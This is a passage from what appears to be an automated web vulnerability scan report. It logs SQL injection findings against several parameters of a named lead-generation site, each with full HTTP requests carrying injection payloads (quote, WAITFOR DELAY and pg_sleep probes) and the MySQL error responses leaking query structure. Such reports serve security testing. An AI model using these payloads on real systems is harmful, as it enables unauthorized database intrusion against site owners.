OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A39%3A%22http%3A%2F%2Fwww.insideup.com%2Fhowitworks.html%22%3B%7D; OAVARS[aca4086b]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2229%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%224%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2FmarketingWhitepaper.html%22%3B%7D Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive
Response 2
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 02:31:06 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 53453
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <base href="http://www ...[SNIP]...
The subcategoryId parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the subcategoryId parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be MySQL.
Request
GET /ppc/leadflow/hins00/project.php?catId=50002&iusrc=iupsc&address=%27;WAITFOR%20DELAY%20%270:0:25%27--&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_421=2739__No&attributeId_422%5B%5D=2742__None+currently&attributeId_487%5B%5D=3199__Not+sure&attributeId_488%5B%5D=3205__Dental+insurance&attributeId_489_t=3&attributeId_491_t=3&attributeId_492_t=3&attributeId_493_t=3&attributeId_514_t=3&attributeId_515=3353__+Yes+-+higher+deductibles&attributeId_555_t=3&attributeId_556_t=3&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=50002'&website=n%2fa&zip=Zip+code HTTP/1.1 Referer: http://www.insideup.com/ppc/leadflow/hins00/project.php?catId=50002&iusrc=iupsc User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations) Cache-Control: no-cache Host: www.insideup.com Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive
Response
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 02:02:28 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Set-Cookie: PHPSESSID=6a6vnn46gbmtsp4adc5cketa53; path=/ Content-Length: 7318 Connection: close Content-Type: text/html; charset=UTF-8
select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lea ...[SNIP]... es&attributeId_555_t=3&attributeId_556_t=3&button3=Submit&companyname=Company Name&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=50002'&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ';WAITFOR DELAY '0:0:25'--&attributeId_342_g=2017__Accounting/Finance&attributeId' at line 5
The subcategoryId parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the subcategoryId parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be MySQL.
Request 1
GET /ppc/leadflow/hins00/project.php?catId=50002&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=SELECT%20pg_sleep(30)--&attributeId_421=2739__No&attributeId_422%5B%5D=2742__None+currently&attributeId_487%5B%5D=3199__Not+sure&attributeId_488%5B%5D=3205__Dental+insurance&attributeId_489_t=3&attributeId_491_t=3&attributeId_492_t=3&attributeId_493_t=3&attributeId_514_t=3&attributeId_515=3353__+Yes+-+higher+deductibles&attributeId_555_t=3&attributeId_556_t=3&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=50002'&website=n%2fa&zip=Zip+code HTTP/1.1 Referer: http://www.insideup.com/ppc/leadflow/hins00/project.php?catId=50002&iusrc=iupsc User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations) Cache-Control: no-cache Host: www.insideup.com Cookie: PHPSESSID=ufgvhtdgfc6dt7a8k325fc19l7; JSESSIONID=A56BEAF6794AE3C017EE1E3398D31303; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A39%3A%22http%3A%2F%2Fwww.insideup.com%2Fhowitworks.html%22%3B%7D; OAVARS[aca4086b]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2229%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%224%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2FmarketingWhitepaper.html%22%3B%7D Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive
Response 1
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 02:31:41 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Content-Length: 7094 Connection: close Content-Type: text/html; charset=UTF-8
select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lea ...[SNIP]... es&attributeId_555_t=3&attributeId_556_t=3&button3=Submit&companyname=Company Name&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=50002'&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'code' OR prj.project_page_url = 'leadflow/hins00/project.php?catId=50002&iusrc=i' at line 5
Request 2
GET /ppc/leadflow/hins00/project.php?catId=50002&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=SELECT%20pg_sleep(30)--&attributeId_421=2739__No&attributeId_422%5B%5D=2742__None+currently&attributeId_487%5B%5D=3199__Not+sure&attributeId_488%5B%5D=3205__Dental+insurance&attributeId_489_t=3&attributeId_491_t=3&attributeId_492_t=3&attributeId_493_t=3&attributeId_514_t=3&attributeId_515=3353__+Yes+-+higher+deductibles&attributeId_555_t=3&attributeId_556_t=3&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=50002''&website=n%2fa&zip=Zip+code HTTP/1.1 Referer: http://www.insideup.com/ppc/leadflow/hins00/project.php?catId=50002&iusrc=iupsc User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations) Cache-Control: no-cache Host: www.insideup.com Cookie: PHPSESSID=ufgvhtdgfc6dt7a8k325fc19l7; JSESSIONID=A56BEAF6794AE3C017EE1E3398D31303; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A39%3A%22http%3A%2F%2Fwww.insideup.com%2Fhowitworks.html%22%3B%7D; OAVARS[aca4086b]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2229%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%224%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2FmarketingWhitepaper.html%22%3B%7D Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive
Response 2
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 02:31:41 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 53453
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <base href="http://www ...[SNIP]...
The website parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the website parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be MySQL.
Request 1
GET /ppc/leadflow/hins00/project.php?catId=50002+OR+X%3d'ss&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_421=2739__No&attributeId_422%5B%5D=2742__None+currently&attributeId_487%5B%5D=3199__Not+sure&attributeId_488%5B%5D=3205__Dental+insurance&attributeId_489_t=3&attributeId_491_t=3&attributeId_492_t=3&attributeId_493_t=3&attributeId_514_t=3&attributeId_515=3353__+Yes+-+higher+deductibles&attributeId_555_t=3&attributeId_556_t=3&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=50002&website=n%2fa'&zip=Zip+code HTTP/1.1 Referer: http://www.insideup.com/ppc/leadflow/hins00/project.php?catId=50002&iusrc=iupsc User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations) Cache-Control: no-cache Host: www.insideup.com Cookie: PHPSESSID=4dobj8gl0r8jekvsqrcejsr783; JSESSIONID=30ABD5D342EFB2121A067D10C4B56069; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A39%3A%22http%3A%2F%2Fwww.insideup.com%2Fhowitworks.html%22%3B%7D Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive
Response 1
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 02:02:38 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Content-Length: 7238 Connection: close Content-Type: text/html; charset=UTF-8
select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lea ...[SNIP]... es&attributeId_555_t=3&attributeId_556_t=3&button3=Submit&companyname=Company Name&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=50002&website=n/a'&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'ss&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting/Finance&attrib' at line 5
Request 2
GET /ppc/leadflow/hins00/project.php?catId=50002+OR+X%3d'ss&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_421=2739__No&attributeId_422%5B%5D=2742__None+currently&attributeId_487%5B%5D=3199__Not+sure&attributeId_488%5B%5D=3205__Dental+insurance&attributeId_489_t=3&attributeId_491_t=3&attributeId_492_t=3&attributeId_493_t=3&attributeId_514_t=3&attributeId_515=3353__+Yes+-+higher+deductibles&attributeId_555_t=3&attributeId_556_t=3&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=50002&website=n%2fa''&zip=Zip+code HTTP/1.1 Referer: http://www.insideup.com/ppc/leadflow/hins00/project.php?catId=50002&iusrc=iupsc User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations) Cache-Control: no-cache Host: www.insideup.com Cookie: PHPSESSID=4dobj8gl0r8jekvsqrcejsr783; JSESSIONID=30ABD5D342EFB2121A067D10C4B56069; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A39%3A%22http%3A%2F%2Fwww.insideup.com%2Fhowitworks.html%22%3B%7D Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive
Response 2
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 02:02:38 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Content-Length: 20 Connection: close Content-Type: text/html; charset=UTF-8
The website parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the website parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be MySQL.
Request
GET /ppc/leadflow/hins00/project.php?catId=50002&iusrc=iupsc&address=%27;WAITFOR%20DELAY%20%270:0:25%27--&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_421=2739__No&attributeId_422%5B%5D=2742__None+currently&attributeId_487%5B%5D=3199__Not+sure&attributeId_488%5B%5D=3205__Dental+insurance&attributeId_489_t=3&attributeId_491_t=3&attributeId_492_t=3&attributeId_493_t=3&attributeId_514_t=3&attributeId_515=3353__+Yes+-+higher+deductibles&attributeId_555_t=3&attributeId_556_t=3&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=50002&website=n%2fa'&zip=Zip+code HTTP/1.1 Referer: http://www.insideup.com/ppc/leadflow/hins00/project.php?catId=50002&iusrc=iupsc User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations) Cache-Control: no-cache Host: www.insideup.com Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive
Response
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 02:02:30 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Set-Cookie: PHPSESSID=lficlmk3fgup56cko45l5qed05; path=/ Content-Length: 7318 Connection: close Content-Type: text/html; charset=UTF-8
select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lea ...[SNIP]... es&attributeId_555_t=3&attributeId_556_t=3&button3=Submit&companyname=Company Name&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=50002&website=n/a'&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ';WAITFOR DELAY '0:0:25'--&attributeId_342_g=2017__Accounting/Finance&attributeId' at line 5
The zip parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the zip parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be MySQL.
Request
GET /ppc/leadflow/hins00/project.php?catId=50002&iusrc=iupsc&address=%27;WAITFOR%20DELAY%20%270:0:25%27--&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_421=2739__No&attributeId_422%5B%5D=2742__None+currently&attributeId_487%5B%5D=3199__Not+sure&attributeId_488%5B%5D=3205__Dental+insurance&attributeId_489_t=3&attributeId_491_t=3&attributeId_492_t=3&attributeId_493_t=3&attributeId_514_t=3&attributeId_515=3353__+Yes+-+higher+deductibles&attributeId_555_t=3&attributeId_556_t=3&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=50002&website=n%2fa&zip=Zip+code' HTTP/1.1 Referer: http://www.insideup.com/ppc/leadflow/hins00/project.php?catId=50002&iusrc=iupsc User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations) Cache-Control: no-cache Host: www.insideup.com Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive
Response
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 02:02:31 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Set-Cookie: PHPSESSID=aapetqcgicg0tpdsdb6nlg74r4; path=/ Content-Length: 7318 Connection: close Content-Type: text/html; charset=UTF-8
select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lea ...[SNIP]... es&attributeId_555_t=3&attributeId_556_t=3&button3=Submit&companyname=Company Name&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=50002&website=n/a&zip=Zip code'/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ';WAITFOR DELAY '0:0:25'--&attributeId_342_g=2017__Accounting/Finance&attributeId' at line 5
The zip parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the zip parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be MySQL.
Request 1
GET /ppc/leadflow/hins00/project.php?catId=50002&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=SELECT%20pg_sleep(30)--&attributeId_421=2739__No&attributeId_422%5B%5D=2742__None+currently&attributeId_487%5B%5D=3199__Not+sure&attributeId_488%5B%5D=3205__Dental+insurance&attributeId_489_t=3&attributeId_491_t=3&attributeId_492_t=3&attributeId_493_t=3&attributeId_514_t=3&attributeId_515=3353__+Yes+-+higher+deductibles&attributeId_555_t=3&attributeId_556_t=3&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=50002&website=n%2fa&zip=Zip+code' HTTP/1.1 Referer: http://www.insideup.com/ppc/leadflow/hins00/project.php?catId=50002&iusrc=iupsc User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations) Cache-Control: no-cache Host: www.insideup.com Cookie: PHPSESSID=ufgvhtdgfc6dt7a8k325fc19l7; JSESSIONID=A56BEAF6794AE3C017EE1E3398D31303; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A39%3A%22http%3A%2F%2Fwww.insideup.com%2Fhowitworks.html%22%3B%7D; OAVARS[aca4086b]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2229%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%224%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2FmarketingWhitepaper.html%22%3B%7D Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive
Response 1
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 02:32:14 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Content-Length: 7094 Connection: close Content-Type: text/html; charset=UTF-8
select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lea ...[SNIP]... es&attributeId_555_t=3&attributeId_556_t=3&button3=Submit&companyname=Company Name&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=50002&website=n/a&zip=Zip code'/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'leadflow/hins00/project.php?catId=50002&iusrc=iupsc&address=Address&attributeId_' at line 5
Request 2
GET /ppc/leadflow/hins00/project.php?catId=50002&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=SELECT%20pg_sleep(30)--&attributeId_421=2739__No&attributeId_422%5B%5D=2742__None+currently&attributeId_487%5B%5D=3199__Not+sure&attributeId_488%5B%5D=3205__Dental+insurance&attributeId_489_t=3&attributeId_491_t=3&attributeId_492_t=3&attributeId_493_t=3&attributeId_514_t=3&attributeId_515=3353__+Yes+-+higher+deductibles&attributeId_555_t=3&attributeId_556_t=3&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=50002&website=n%2fa&zip=Zip+code'' HTTP/1.1 Referer: http://www.insideup.com/ppc/leadflow/hins00/project.php?catId=50002&iusrc=iupsc User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations) Cache-Control: no-cache Host: www.insideup.com Cookie: PHPSESSID=ufgvhtdgfc6dt7a8k325fc19l7; JSESSIONID=A56BEAF6794AE3C017EE1E3398D31303; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A39%3A%22http%3A%2F%2Fwww.insideup.com%2Fhowitworks.html%22%3B%7D; OAVARS[aca4086b]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2229%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%224%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2FmarketingWhitepaper.html%22%3B%7D Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive
Response 2
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 02:32:16 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 53453
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <base href="http://www ...[SNIP]...
The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 2, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 06:37:08 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Set-Cookie: PHPSESSID=8c2n31rovalbpva9jou5244ui2; path=/ Content-Length: 2486 Connection: close Content-Type: text/html; charset=UTF-8
select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lea ...[SNIP]... leadflow'/hins00/project_dynamic_page_updated.php?catId=50002&group=hins00&template=3' OR prj.project_page_url = 'leadflow'/hins00/project_dynamic_page_updated.php?catId=50002&group=hins00&template=3/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '?catId=50002&group=hins00&template=3' OR prj.project_page_url = 'leadflow'/hins0' at line 5
The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 3, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 06:37:27 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Set-Cookie: PHPSESSID=j8s9pgtlhnagvuhs7o2atg4i73; path=/ Content-Length: 2486 Connection: close Content-Type: text/html; charset=UTF-8
select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lea ...[SNIP]... leadflow/hins00'/project_dynamic_page_updated.php?catId=50002&group=hins00&template=3' OR prj.project_page_url = 'leadflow/hins00'/project_dynamic_page_updated.php?catId=50002&group=hins00&template=3/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '?catId=50002&group=hins00&template=3' OR prj.project_page_url = 'leadflow/hins00' at line 5
The REST URL parameter 4 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 4, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 06:37:36 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Set-Cookie: PHPSESSID=gq3rfa4k1544a0ki0ajn758jf4; path=/ Content-Length: 2486 Connection: close Content-Type: text/html; charset=UTF-8
